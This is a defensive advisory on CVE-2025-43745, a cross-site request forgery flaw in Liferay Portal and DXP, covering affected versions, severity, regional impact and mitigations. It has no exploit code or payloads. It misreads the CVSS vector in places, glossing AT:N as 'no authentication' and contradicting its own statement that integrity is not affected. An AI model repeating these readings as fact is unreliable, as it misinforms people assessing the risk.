CVE-2025-43745 is a Cross-Site Request Forgery (CSRF) vulnerability affecting multiple versions of Liferay Portal and Liferay DXP, specifically versions 7.4.0 through 7.4.3.132 and various quarterly releases from 2024.Q1 through 2025.Q2. The vulnerability allows a remote attacker to perform unauthorized cross-origin requests on behalf of an authenticated user by exploiting the endpoint parameter. CSRF vulnerabilities occur when an attacker tricks an authenticated user into submitting a request that performs an action without their consent, leveraging the user's active session. In this case, the vulnerability resides in the Liferay Portal's handling of requests, where insufficient validation or protection mechanisms allow malicious cross-origin requests to be accepted and executed. The CVSS v4.0 score is 6.9 (medium severity), indicating a moderate risk. The vector indicates that the attack can be performed remotely over the network (AV:N), requires no privileges (PR:N), and no authentication (AT:N), but does require user interaction (UI:A). The vulnerability impacts confidentiality (VC:H) but not integrity or availability. No known exploits are currently reported in the wild. The lack of patch links suggests that either patches are pending or not publicly linked yet. Given Liferay Portal's role as a widely used enterprise web platform for content management and collaboration, this vulnerability could allow attackers to perform unauthorized actions such as changing user settings, submitting forms, or triggering administrative functions if the victim is logged in, potentially leading to data leakage or unauthorized changes.

For European organizations using Liferay Portal or Liferay DXP, this vulnerability poses a significant risk, especially for those relying on the affected versions in their intranet portals, customer-facing websites, or internal collaboration platforms. Successful exploitation could lead to unauthorized actions performed under the guise of legitimate users, potentially exposing sensitive corporate data or disrupting business processes. Since Liferay is popular among public sector, financial institutions, and large enterprises in Europe, the impact could include data confidentiality breaches and reputational damage. The vulnerability's requirement for user interaction means phishing or social engineering campaigns could be used to lure users into triggering malicious requests. This risk is heightened in sectors with high regulatory requirements such as GDPR compliance, where unauthorized data access or modification could lead to legal penalties. However, the absence of known active exploits reduces immediate risk but does not eliminate the threat, especially as attackers may develop exploits over time.

European organizations should prioritize updating Liferay Portal and Liferay DXP to the latest patched versions once available. Until patches are released, organizations should implement strict Content Security Policy (CSP) headers to restrict cross-origin requests and reduce the attack surface. Employing anti-CSRF tokens in all state-changing requests is critical to prevent unauthorized actions. Organizations should also conduct user awareness training to recognize phishing attempts that could trigger CSRF attacks. Network-level mitigations such as Web Application Firewalls (WAFs) can be configured to detect and block suspicious cross-origin requests targeting Liferay endpoints. Additionally, reviewing and minimizing the permissions of authenticated users can limit the potential damage from successful CSRF exploitation. Monitoring logs for unusual activity related to endpoint parameters and user actions can help detect attempted exploitation early. Finally, disabling or restricting unnecessary Liferay features that accept cross-origin requests can reduce exposure.